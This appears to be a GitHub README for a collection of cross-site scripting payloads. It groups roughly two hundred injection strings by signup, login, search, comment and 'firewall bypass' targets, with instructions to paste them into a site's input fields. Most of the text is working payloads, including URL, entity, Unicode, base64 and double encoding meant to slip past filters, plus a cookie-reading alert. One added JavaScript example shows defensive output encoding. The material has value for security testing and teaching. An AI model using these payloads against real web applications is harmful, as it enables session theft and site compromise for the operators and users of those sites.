54J4N/XSS-Vulnerability-Payloads

XSS-Vulnerability-Payloads

Introduction

Welcome to the Comprehensive XSS Payloads repository! This repository contains a thorough collection of powerful XSS payloads designed to test the security of web applications across various sections such as signup, login, search, comments, and firewall bypassing. These payloads are crafted to bypass various filters and input validations, making them effective for discovering XSS vulnerabilities.

Usage

These payloads can be used to test different sections of web applications. To use a payload, simply copy it from the list below and paste it into the input field you wish to test. Observe if the payload executes, indicating an XSS vulnerability.

Example Steps

  1. Navigate to the Target Section: Go to the relevant section of the target website, for example: https://example.com/signup, https://example.com/login, https://example.com/search, or https://example.com/comments.

  2. Enter the Payload: Input one of the payloads from the list into the respective input field (username, password, email, comments, etc.).

  3. Submit the Form: Press enter or click the submit button to send the form.

  4. Observe the Results: If the input field is vulnerable to XSS, an alert box with the specified message should appear, revealing an XSS vulnerability.
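
What step 4 is actually observing, as an added example that is not part of this repository: most entries below begin with `">`, which closes a double-quoted attribute and its tag when the value is reflected without encoding. The search page template, function names and the `decodeTwice` model are assumptions made for illustration; the two input strings are quoted from the list on this page.

```javascript
// Added example: names, template and samples are illustrative assumptions.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Output encoding for HTML text and quoted-attribute contexts.
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// Hypothetical search page: reflects the query as text and inside value="...".
function renderSearch(query, encode) {
  const v = encode ? encodeHtml(query) : query;
  return `<p>Results for ${v}</p><input name="q" value="${v}">`;
}

// Minimal tag counter that honours quoted attribute values (not a full HTML parser).
function countTags(html) {
  let count = 0;
  let inTag = false;
  let quote = null;
  for (let i = 0; i < html.length; i++) {
    const c = html[i];
    if (quote) {
      if (c === quote) quote = null;            // closing quote of an attribute value
    } else if (inTag) {
      if (c === '"' || c === "'") quote = c;    // entering a quoted attribute value
      else if (c === '>') inTag = false;
    } else if (c === '<' && /[A-Za-z\/!]/.test(html[i + 1] || '')) {
      inTag = true;
      count++;
    }
  }
  return count;
}

// The template itself contributes <p>, </p> and <input>; anything beyond that was injected.
const TEMPLATE_TAGS = countTags(renderSearch('', false));
function injectsMarkup(html) {
  return countTags(html) > TEMPLATE_TAGS;
}

// Models a stack that URL-decodes the same parameter twice (e.g. a proxy, then the app).
function decodeTwice(s) {
  return decodeURIComponent(decodeURIComponent(s));
}

// Two strings quoted from the payload list on this page.
const BREAKOUT = '"><svg/onload=alert(1)>';
const DOUBLE_ENCODED = '%253Cscript%253Ealert(1)%253C%252Fscript%253E';

function report() {
  const inputs = {
    breakout: BREAKOUT,
    doubleEncodedAsSent: DOUBLE_ENCODED,
    doubleEncodedDecodedTwice: decodeTwice(DOUBLE_ENCODED),
  };
  const out = {};
  for (const [name, value] of Object.entries(inputs)) {
    out[name] = {
      raw: injectsMarkup(renderSearch(value, false)),
      encoded: injectsMarkup(renderSearch(value, true)),
    };
  }
  return out;
}

console.log(report());
```

The `encoded` result stays false for every input, including the one that only becomes markup after a second decode, which is why the fix belongs at output time rather than in an input filter.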

Payloads

Signup and Login Sections

"><svg/onload=alert(1)> : SVG tag with onload event to trigger JavaScript.
"><img src=x onerror=alert(1)> : Image tag with onerror event to execute JavaScript.
"><script>alert(1)</script> : Simple script tag to execute JavaScript.
"><iframe src="javascript:alert(1)"></iframe> : Iframe tag with JavaScript source to execute alert.
"><input type="text" value="<script>alert(1)</script>"> : Input field with embedded script tag.
"><body onload=alert(1)> : Body tag with onload event to execute JavaScript.
"><img src=x onerror="this.onerror=null;alert(1)"> : Image tag with self-nullifying onerror event.
"><audio src=x onerror=alert(1)> : Audio tag with onerror event to trigger JavaScript.
"><video src=x onerror=alert(1)> : Video tag with onerror event to execute alert.
"><marquee onstart=alert(1)> : Marquee tag with onstart event to execute JavaScript.
"><object data="data:text/html,<script>alert(1)</script>"></object> : Object tag with data URL containing JavaScript.
"><embed src="data:text/html,<script>alert(1)</script>"> : Embed tag with data URL containing JavaScript.
"><form action="javascript:alert(1)"><input type="submit"></form> : Form tag with action attribute set to JavaScript.
"><link rel="stylesheet" href="javascript:alert(1)"> : Link tag with href attribute set to JavaScript.
"><svg><desc><![CDATA[</desc><script>alert(1)//]]></script> : SVG tag with CDATA section to execute JavaScript.
"><math><maction xlink:href="javascript:alert(1)">click</maction></math> : MathML tag with xlink attribute for JavaScript.
"><meta http-equiv="refresh" content="0;url=javascript:alert(1)"> : Meta tag with refresh attribute set to JavaScript.
"><input type="button" onclick=alert(1) value="Click me"> : Input button with onclick event to trigger alert.
"><textarea onfocus=alert(1) autofocus> : Textarea with onfocus event to execute JavaScript.
"><select onfocus=alert(1) autofocus><option>1</option></select> : Select element with onfocus event to execute alert.
"><svg><use xlink:href="javascript:alert(1)"></use></svg> : SVG use tag with xlink attribute set to JavaScript.
"><div style="width: expression(alert(1));"> : Div tag with CSS expression to execute JavaScript.
"><a href="javascript:alert(1)">Click me</a> : Anchor tag with href attribute set to JavaScript.
"><input type="image" src="javascript:alert(1);"> : Input image with src attribute set to JavaScript.
"><form><button formaction="javascript:alert(1)">Submit</button></form> : Form with button formaction attribute set to JavaScript.
"><img src=x onerror="alert(String.fromCharCode(88,83,83))"> : Image tag with onerror event using String.fromCharCode to execute alert.
"><iframe src="data:text/html,<script>alert(1)</script>"></iframe> : Iframe with data URL containing JavaScript.
"><script>alert(1)// : Script tag with single-line comment to break out of attributes.
"><svg/onmouseover=alert(1)> : SVG tag with onmouseover event to execute JavaScript.
"><div onclick=alert(1)>Click me</div> : Div tag with onclick event to trigger alert.
"><meta content="text/html; charset=UTF-7"><script>alert(1)</script> : Meta tag with charset attribute set to UTF-7.
"><img src=x onmouseover=alert(1)> : Image tag with onmouseover event to execute alert.
"><div style="background:url('javascript:alert(1)')"> : Div tag with CSS background URL containing JavaScript.
"><svg/onmouseenter=alert(1)> : SVG tag with onmouseenter event to execute JavaScript.
"><svg/onmouseleave=alert(1)> : SVG tag with onmouseleave event to execute JavaScript.
"><svg/onfocus=alert(1)> : SVG tag with onfocus event to execute JavaScript.
"><svg/onblur=alert(1)> : SVG tag with onblur event to execute JavaScript.
"><div id="x" style="width:100px;height:100px;" onclick="alert(1)">Click me</div> : Div tag with id, style, and onclick attributes to trigger alert.
"><div style="background:url(javascript:alert(1));"> : Div tag with CSS background URL containing JavaScript.
"><div style="width: expression(alert(1));"> : Div tag with CSS expression to execute JavaScript.
"><img src=x:alert(1) onerror=eval(src)> : Image tag with eval in onerror attribute to execute JavaScript.
"><svg><use xlink:href="javascript:alert(1)"></use></svg> : SVG use tag with xlink attribute set to JavaScript.
"><object data="data:text/html,<script>alert(1)</script>"></object> : Object tag with data URL containing JavaScript.
"><embed src="data:text/html,<script>alert(1)</script>"> : Embed tag with data URL containing JavaScript.
"><input type="text" value='1 & onmouseover="alert(1)" autofocus> : Input field with onmouseover event to execute JavaScript.
"><img src=x onerror=alert(String.fromCharCode(88,83,83))> : Image tag with onerror event using String.fromCharCode to execute alert.
"><iframe src="data:text/html,<script>alert(1)</script>"></iframe> : Iframe with data URL containing JavaScript.
"><script src="data:text/javascript,alert(1);"></script> : Script tag with data URL containing JavaScript.

Search Section

\"><svg/onload=eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))> : SVG tag with onload event using decimal character codes (String.fromCharCode) for the alert function.
%3Cimg%20src%3Dx%20onerror%3Dalert%28%27XSS%27%29%3E : Encodes the payload using URL encoding to bypass filters.
&#60;script&#62;alert('XSS')&#60;/script&#62; : Uses decimal HTML character references for the angle brackets to bypass filters.
%253Cscript%253Ealert%2528'XSS'%2529%253C/script%253E : Double encoding to further obfuscate the payload.
\"><img src=x onerror=alert('XSS')><svg/onload=alert('XSS')><script>alert('XSS')</script> : Combines multiple vectors to ensure execution in different contexts.
\"><img src=x onerror=alert(1)> : Inline event handler in HTML attributes.
\"><script>alert('XSS')</script> : Breaking out of HTML contexts.
\"><img src=x onerror=\u0061lert('XSS')> : Obfuscated JavaScript using Unicode escape sequences.
\"><script src="data:text/javascript,alert('XSS');"></script> : Script with data URL.
\"><svg><script>alert('XSS')</script></svg> : SVG with script.
\"><object data="data:text/html,<script>alert('XSS')</script>"></object> : Object data with script.
\"><embed src="data:text/html,<script>alert('XSS')</script>"></embed> : Embed data with script.
\"><input type="image" src="javascript:alert('XSS');"> : Input image with JavaScript.
\"><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> : Base64 encoded alert in iframe.
\"><math><maction xlink:href="javascript:alert('XSS')">click</maction></math> : MathML with xlink.
\"><iframe src="javascript:alert('XSS')"></iframe> : Iframe with JavaScript source.
\"><meta content="text/html; charset=UTF-7" http-equiv="Content-Type"><script>alert('XSS')</script> : Meta charset UTF-7.
\"><iframe src="data:text/html,<body onload=alert('XSS')>"></iframe> : Iframe with body onload.
\"><scr<script%20>alert('XSS') : URL-encoded space in script tag.
\"><scr\i\pt>alert(1)</scr\i\pt> : Script tag with backslashes.
\"><div style="width: expression(alert('XSS'));"> : CSS expression.
\"><scr'+'ipt>alert('XSS')</scr'+'ipt> : Concatenated script tags.
\"><iframe srcdoc="&lt;svg onload=alert('XSS')&gt;"></iframe> : Encoded SVG onload in iframe srcdoc.
\"><img src="x <img src="x" onerror="alert('XSS')"> : Incomplete image tag followed by full tag.
\"><input type="button" onclick="alert&lpar;'XSS'&rpar;" value="Click me"> : Encoded parentheses in onclick.
\"><svg/onload=alert&lpar;'XSS'&rpar;> : Encoded parentheses in onload.
\"><body onload="javascript:alert&lpar;'XSS'&rpar;"> : Body onload with encoded parentheses.
\"><img src=javascript:alert&lpar;'XSS'&rpar;> : Encoded parentheses in img src.
\"><div style="background:url(&#106avascript:alert('XSS'))"> : Encoded "javascript" in background URL.
\"><iframe src="javas&#x63;ript:alert('XSS')"></iframe> : Hexadecimal encoded "javascript" in iframe.
\"><img src=java\script:alert('XSS')> : Escaped "script" in img src.
\"><scr\ipt>alert&lpar;'XSS'&rpar;</scr\ipt> : Escaped script tag with encoded alert.
\"><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> : Base64 encoded alert in iframe.
\"><link rel="stylesheet" href="data:text/css,.x{background:url(javascript:alert('XSS'))}"> : CSS with JavaScript URL.
\"><form><button formaction="javascript:alert&lpar;'XSS'&rpar;">Submit</button></form> : Button formaction with encoded alert.
\"><input type="text" value='1 & onmouseover="alert(&apos;XSS&apos;)" autofocus> : Input with onmouseover and single quotes.
\"><img src=x onerror=alert(String.fromCharCode(88,83,83))> : onerror with String.fromCharCode.
\"><iframe src="data:text/html,<script>alert&lpar;'XSS'&rpar;</script>"></iframe> : Encoded alert in data URL.
\"><svg><use xlink:href="javascript:alert&lpar;'XSS'&rpar;"></use></svg> : SVG use with xlink and encoded alert.
\"><script src="data:text/javascript,alert&lpar;'XSS'&rpar;"></script> : Encoded alert in script src.
\"><body onpageshow=alert('XSS')> : Body onpageshow event.
\"><input type="image" src="javascript:alert('XSS');"> : Input image with JavaScript.
\"><a href="javas&Tab;cript:alert('XSS')">Click me</a> : Tab character in JavaScript URL.
\"><meta http-equiv="set-cookie" content="name=value; path=/; HttpOnly"><script>alert(document.cookie)</script> : HTTP-only cookie with alert.
\"><img src=x:alert(1) onerror=eval(src)> : eval with img src.
\"><iframe src="data:text/html,<div onclick=alert('XSS')>Click me</div>"></iframe> : Iframe with div onclick.

Comments Section

"><svg/onload=alert(1)> : SVG tag with onload event to trigger JavaScript.
"><img src=x onerror=alert(1)> : Image tag with onerror event to execute JavaScript.
"><script>alert(1)</script> : Simple script tag to execute JavaScript.
"><iframe src="javascript:alert(1)"></iframe> : Iframe tag with JavaScript source to execute alert.
"><input type="text" value="<script>alert(1)</script>"> : Input field with embedded script tag.
"><body onload=alert(1)> : Body tag with onload event to execute JavaScript.
"><img src=x onerror="this.onerror=null;alert(1)"> : Image tag with self-nullifying onerror event.
"><audio src=x onerror=alert(1)> : Audio tag with onerror event to trigger JavaScript.
"><video src=x onerror=alert(1)> : Video tag with onerror event to execute alert.
"><marquee onstart=alert(1)> : Marquee tag with onstart event to execute JavaScript.
"><object data="data:text/html,<script>alert(1)</script>"></object> : Object tag with data URL containing JavaScript.
"><embed src="data:text/html,<script>alert(1)</script>"> : Embed tag with data URL containing JavaScript.
"><form action="javascript:alert(1)"><input type="submit"></form> : Form tag with action attribute set to JavaScript.
"><link rel="stylesheet" href="javascript:alert(1)"> : Link tag with href attribute set to JavaScript.
"><svg><desc><![CDATA[</desc><script>alert(1)//]]></script> : SVG tag with CDATA section to execute JavaScript.
"><math><maction xlink:href="javascript:alert(1)">click</maction></math> : MathML tag with xlink attribute for JavaScript.
"><meta http-equiv="refresh" content="0;url=javascript:alert(1)"> : Meta tag with refresh attribute set to JavaScript.
"><input type="button" onclick=alert(1) value="Click me"> : Input button with onclick event to trigger alert.
"><textarea onfocus=alert(1) autofocus> : Textarea with onfocus event to execute JavaScript.
"><select onfocus=alert(1) autofocus><option>1</option></select> : Select element with onfocus event to execute alert.
"><svg><use xlink:href="javascript:alert(1)"></use></svg> : SVG use tag with xlink attribute set to JavaScript.
"><div style="width: expression(alert(1));"> : Div tag with CSS expression to execute JavaScript.
"><a href="javascript:alert(1)">Click me</a> : Anchor tag with href attribute set to JavaScript.
"><input type="image" src="javascript:alert(1);"> : Input image with src attribute set to JavaScript.
"><form><button formaction="javascript:alert(1)">Submit</button></form> : Form with button formaction attribute set to JavaScript.
"><img src=x onerror="alert(String.fromCharCode(88,83,83))"> : Image tag with onerror event using String.fromCharCode to execute alert.
"><iframe src="data:text/html,<script>alert(1)</script>"></iframe> : Iframe with data URL containing JavaScript.
"><script>alert(1)// : Script tag with single-line comment to break out of attributes.
"><svg/onmouseover=alert(1)> : SVG tag with onmouseover event to execute JavaScript.
"><div onclick=alert(1)>Click me</div> : Div tag with onclick event to trigger alert.
"><meta content="text/html; charset=UTF-7"><script>alert(1)</script> : Meta tag with charset attribute set to UTF-7.
"><img src=x onmouseover=alert(1)> : Image tag with onmouseover event to execute alert.
"><div style="background:url('javascript:alert(1)')"> : Div tag with CSS background URL containing JavaScript.
"><svg/onmouseenter=alert(1)> : SVG tag with onmouseenter event to execute JavaScript.
"><svg/onmouseleave=alert(1)> : SVG tag with onmouseleave event to execute JavaScript.
"><svg/onfocus=alert(1)> : SVG tag with onfocus event to execute JavaScript.
"><svg/onblur=alert(1)> : SVG tag with onblur event to execute JavaScript.
"><div id="x" style="width:100px;height:100px;" onclick="alert(1)">Click me</div> : Div tag with id, style, and onclick attributes to trigger alert.
"><div style="background:url(javascript:alert(1));"> : Div tag with CSS background URL containing JavaScript.
"><div style="width: expression(alert(1));"> : Div tag with CSS expression to execute JavaScript.
"><img src=x:alert(1) onerror=eval(src)> : Image tag with eval in onerror attribute to execute JavaScript.
"><svg><use xlink:href="javascript:alert(1)"></use></svg> : SVG use tag with xlink attribute set to JavaScript.
"><object data="data:text/html,<script>alert(1)</script>"></object> : Object tag with data URL containing JavaScript.
"><embed src="data:text/html,<script>alert(1)</script>"> : Embed tag with data URL containing JavaScript.
"><input type="text" value='1 & onmouseover="alert(1)" autofocus> : Input field with onmouseover event to execute JavaScript.
"><img src=x onerror=alert(String.fromCharCode(88,83,83))> : Image tag with onerror event using String.fromCharCode to execute alert.
"><iframe src="data:text/html,<script>alert(1)</script>"></iframe> : Iframe with data URL containing JavaScript.
"><script src="data:text/javascript,alert(1);"></script> : Script tag with data URL containing JavaScript.

Bypassing Firewalls

"><img src=x onerror=alert(1)> : Basic payload using img onerror event.
%3Cscript%3Ealert(1)%3C%2Fscript%3E : URL-encoded script tag to bypass filters.
&#60;script&#62;alert(1)&#60;/script&#62; : HTML entity encoded script tag.
%253Cscript%253Ealert(1)%253C%252Fscript%253E : Double URL-encoded script tag.
"><svg/onload=alert(1)> : SVG onload event to trigger alert.
"><iframe src="javascript:alert(1)"></iframe> : Iframe tag with JavaScript source.
"><input type="text" value="<script>alert(1)</script>"> : Input field with embedded script tag.
"><body onload=alert(1)> : Body tag with onload event to execute alert.
"><img src=x onerror="this.onerror=null;alert(1)"> : Image tag with self-nullifying onerror event.
"><audio src=x onerror=alert(1)> : Audio tag with onerror event.
"><video src=x onerror=alert(1)> : Video tag with onerror event.
"><marquee onstart=alert(1)> : Marquee tag with onstart event.
"><object data="data:text/html,<script>alert(1)</script>"></object> : Object tag with data URL.
"><embed src="data:text/html,<script>alert(1)</script>"> : Embed tag with data URL.
"><form action="javascript:alert(1)"><input type="submit"></form> : Form tag with JavaScript action.
"><link rel="stylesheet" href="javascript:alert(1)"> : Link tag with JavaScript href.
"><svg><desc><![CDATA[</desc><script>alert(1)//]]></script> : SVG tag with CDATA section.
"><math><maction xlink:href="javascript:alert(1)">click</maction></math> : MathML tag with xlink attribute.
"><meta http-equiv="refresh" content="0;url=javascript:alert(1)"> : Meta tag with refresh attribute.
"><input type="button" onclick=alert(1) value="Click me"> : Input button with onclick event.
"><textarea onfocus=alert(1) autofocus> : Textarea with onfocus event.
"><select onfocus=alert(1) autofocus><option>1</option></select> : Select element with onfocus event.
"><svg><use xlink:href="javascript:alert(1)"></use></svg> : SVG use tag with xlink attribute.
"><div style="width: expression(alert(1));"> : Div tag with CSS expression.
"><a href="javascript:alert(1)">Click me</a> : Anchor tag with JavaScript href.
"><input type="image" src="javascript:alert(1);"> : Input image with JavaScript src.
"><form><button formaction="javascript:alert(1)">Submit</button></form> : Form with button formaction.
"><img src=x onerror="alert(String.fromCharCode(88,83,83))"> : Image tag with String.fromCharCode.
"><iframe src="data:text/html,<script>alert(1)</script>"></iframe> : Iframe with data URL.
"><script>alert(1)// : Script tag with single-line comment.
"><svg/onmouseover=alert(1)> : SVG tag with onmouseover event.
"><div onclick=alert(1)>Click me</div> : Div tag with onclick event.
"><meta content="text/html; charset=UTF-7"><script>alert(1)</script> : Meta tag with charset UTF-7.
"><img src=x onmouseover=alert(1)> : Image tag with onmouseover event.
"><div style="background:url('javascript:alert(1)')"> : Div tag with JavaScript background URL.
"><svg/onmouseenter=alert(1)> : SVG tag with onmouseenter event.
"><svg/onmouseleave=alert(1)> : SVG tag with onmouseleave event.
"><svg/onfocus=alert(1)> : SVG tag with onfocus event.
"><svg/onblur=alert(1)> : SVG tag with onblur event.
"><div id="x" style="width:100px;height:100px;" onclick="alert(1)">Click me</div> : Div tag with onclick event.
"><div style="background:url(javascript:alert(1));"> : Div tag with JavaScript background URL.
"><div style="width: expression(alert(1));"> : Div tag with CSS expression.
"><img src=x:alert(1) onerror=eval(src)> : Image tag with eval in onerror.
"><svg><use xlink:href="javascript:alert(1)"></use></svg> : SVG use tag with xlink attribute.
"><object data="data:text/html,<script>alert(1)</script>"></object> : Object tag with data URL.
"><embed src="data:text/html,<script>alert(1)</script>"> : Embed tag with data URL.
"><input type="text" value='1 & onmouseover="alert(1)" autofocus> : Input field with onmouseover event.
"><img src=x onerror=alert(String.fromCharCode(88,83,83))> : Image tag with String.fromCharCode.
"><iframe src="data:text/html,<script>alert(1)</script>"></iframe> : Iframe with data URL.
"><script src="data:text/javascript,alert(1);"></script> : Script tag with data URL.
<svg/onload=alert(1)// : SVG tag with onload event and comment.
<img src=x onerror=alert('XSS')> : Image tag with onerror event for XSS.
"><script>document.write('<img src=x onerror=alert(1)>')</script> : Script tag writing an image tag.
"><script>document.body.innerHTML='<img src=x onerror=alert(1)>'</script> : Script tag modifying the body HTML.
<img src=x onerror="window.onerror=null;alert(1)"> : Image tag with self-nullifying onerror event.
"><iframe srcdoc="<svg/onload=alert(1)>"></iframe> : Iframe with srcdoc containing SVG onload.
"><meta charset="x-user-defined"><script>alert(String.fromCharCode(88,83,83))</script> : Meta tag with user-defined charset.
"><svg xmlns:xlink="http://www.w3.org/1999/xlink"><script xlink:href="data:text/javascript,alert(1)"></script></svg> : SVG tag with xlink and data URL.
"><style>@import 'javascript:alert(1)';</style> : Style tag importing JavaScript.
"><meta http-equiv="refresh" content="0;url=data:text/html,<script>alert(1)</script>"> : Meta tag with refresh attribute and data URL.
"><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> : Iframe with base64 encoded script.
"><iframe src="data:text/html,<body onload=alert(1)></iframe> : Iframe with body onload event.
"><meta http-equiv="refresh" content="0;url=javascript:alert(1)"> : Meta tag with refresh attribute set to JavaScript.
"><input type="button" onclick=alert(1) value="Click me"> : Input button with onclick event to trigger alert.
"><textarea onfocus=alert(1) autofocus> : Textarea with onfocus event.

Contributing

I welcome contributions to this repository! If you have additional payloads or improvements, please submit a pull request. Ensure your contributions adhere to ethical guidelines and responsible disclosure practices.
